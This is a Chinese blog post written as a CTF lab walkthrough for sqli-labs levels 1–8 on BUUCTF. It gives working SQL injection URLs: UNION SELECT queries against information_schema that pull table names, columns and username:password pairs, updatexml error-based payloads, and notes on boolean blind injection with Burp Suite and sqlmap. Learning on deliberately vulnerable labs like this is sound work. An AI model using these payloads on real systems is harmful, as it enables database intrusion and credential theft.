sql注入(2021寒假)

最新推荐文章于 2023-11-18 10:57:42 发布
最新推荐文章于 2023-11-18 10:57:42 发布
阅读量371 收藏
点赞数
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55773382/article/details/122210708
版权

BUUCTF练习

sql注入

本质:将用户输入的不可信数据当作代码去执行
条件:用户控制输入,原本程序要执行的代码,拼接用户输入的内容,然后去执行

第一题http://1c71b02a-c58f-4ee9-a951-7efe3109c4d6.node4.buuoj.cn/Less-1/

单引号报错输入
1,查看是否闭合,输入?id=1’时,一直显示near ‘‘1’’ LIMIT 0,1’ at line 1,所以猜测id是闭合的,且是字符型注入
2,输入1’ --+
3,使用order by查看有多少列,使用order by对前面的数据进行排序,本题只有三列,同时要查找的数据在第二列
4,查找数据库名,使用http://192.168.67.134/sqli/Less-1/?id=0’ union select 1,user(),database() --+
这里为了报错,使用0,同时查看数据库用户以及数据库名称
5,查询数据库表名使用http://192.168.67.134/sqli/Less-1/?id=0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
6,查找字段
使用http://192.168.67.134/sqli/Less-1/?id=0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ --+//注意,这里的数据库名一定要用单引号,因为是一个字符
7,查询字段的值使用http://192.168.67.134/sqli/Less-1/?id=0’ union select 1,group_concat(username,0x3a,password),3 from users --+ //使用0x3a是冒号的作用

第二题http://1c71b02a-c58f-4ee9-a951-7efe3109c4d6.node4.buuoj.cn/Less-2/

1,当输入?id=1’时
出现 " limit 1’判断是整型输入,所以是?id=1
2,再是使用order by查看列数
3,使用联合词 union select1,2,3查看用户以及数据库的位置
4,在时使用 union select 1,user(),database() --+查看相应的名字
5,下边的步骤跟第一题的一样,就能够成注入

第三题http://195a5279-98ad-4455-a0fb-f9416c70ece9.node4.buuoj.cn/Less-3/

1,当输入单引号字符型时,
alt
2,下边的步骤跟之前前两题一样的方法

第四题

题型是双引号加括号,做题方法跟前面的一样
前四题总结一下,都可以采用联合注入与报错注入

第五题

这里无论输入什么,显示都是显示YOU ARE IN…(采用联合注入都没有数据可以显示)
在这里插入图片描述
输入1’时
在这里插入图片描述
本题尝试用报错注入,布尔型注入,时间盲注等等,工程量比较大。。。。
最好采用sqlmap
这题说明了闭合状态就是 ’
1,
在这里插入图片描述
解决方法采用的就是报错注入
2,查询有多少列
3,查询数据库名
?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+
4,查询字段名
?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),0x7e),1) --+
在这里插入图片描述可以判断出本题就是盲注

在这里插入图片描述
6,查询字段里的数据
?id=-1’ and updatexml(1,concat(0x7e,select(username,0x3a,password) from user),0x7e),1) --+

发现不能全部显示,所以采用加入id=…来进行逐个查看
http://d2eaf102-0b78-41c7-8f16-4b42a64d2bd8.node4.buuoj.cn/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(username,0x3a,password)%20from%20users%20where%20id=1),0x7e),1)%20–+

第六题

这题与第五题进行对比,可以看到只是闭合的方式不同而已,采用的是双引号
在这里插入图片描述
所以做题方法跟第五题一摸一样

第七题

在这里插入图片描述这题一开始写是没有思路的,去查看别人的做题记录

在这里插入图片描述
总结,没有弄懂

第八题

本题是布尔型盲注
1,当输入时?id=1时
在这里插入图片描述
2,输入2’时

在这里插入图片描述可以判断闭合方式是’
3,判断长度是多少在这里插入图片描述如图可以知道长度为八
4,下一步就是拆解数据库的名字
使用burpsuite抓包instruder,查找到数据库的名字
5,再是采用sqlmap查字段,查字段的数据等
在这里插入图片描述
在这里插入图片描述

七月24
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sqli-lab1到4关详解
cangyu51462的博客
04-12 431
sqli-lab 1-4
Pikachu布尔盲注结合BurpSuite获取数据库名字详解
最新发布
小小小屿屿屿的博客
11-18 505
有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注。盲注根据展现方式,分为布尔型盲注和时间型盲注。
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1241
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
sqli-labs闯关指南--01-10关(非常详细)
weixin_44576725的博客
11-05 4482
注意: 如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。 另外-- (这里有一个空格,–空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。 要学会利用报错信息来判断注入类型!!! Less-1 1、先测试and 1=2,回显正常,说明不是数值型注入 2、接着在id=1后添
MySQL server version for the right syntax to use near ‘limit 0,1‘
无名小卒菜的博客
02-21 1489
sql语句里面已经写了limit语句,最后执行又多了一个limit ?,? 将sql中的limit去除,调用pageHelper的startPage分页,可能是pom文件中引入了pageHelper插件,执行sql会自动封装limit语句。 参考: 分页助手PAGEHELPER之PAGEHELPER.STARTPAGE()去除后,还存在LIMIT分页查询数据,SQL查询LIMIT分页问题处理 mybatis 查询语句自动添加limit的问题 ...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
超级SQL批量注入工具
12-14
sql注入,超级sql注入数据库注入,sql注入检测,sql批量注入检测工具
超级SQL注入工具 V1.0 绿色免费版
04-25
超级SQL注入工具 V1.0 绿色免费版,可用于批量检测是否有注入漏洞,可对单个站点进行注入,很多强大功能。
ORDER BY LIMIT 0,1意思
热门推荐
过客的博客
12-14 3万+
limit 0,1, 从你的表中的第0个数据开始,只读取一个;
SQL注入专题
SeanWXQ的专栏
12-21 810
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。    随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,
漏洞学习--SQL注入
qq_45675619的博客
02-19 5525
漏洞学习--SQL注入
2021/10/1SQL注入
A的博客
10-13 91
+转义为空格
实验吧ctf-web题:简单的sql注入
Elvira
08-25 1万+
简单的sql注入 1. 基于报错的检测方法 2. 基于布尔的检测方法
bugku SQL注入题目合集
xuchen16的博客
09-30 2630
转载自:http://www.northity.com/2018/06/12/Bugku%E9%A2%98%E7%9B%AE%E9%9B%86%E9%94%A60x02/ SQL注入题目合集 这是一个神奇的登陆框 传送门 在用户名的后面加一个\可以看到报错,应该是能够报错注入或者联合查询之类的 但是最近学到了一些骚套路,先来看看sqlmap sqlmap 直接burp抓包另存为一个t...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值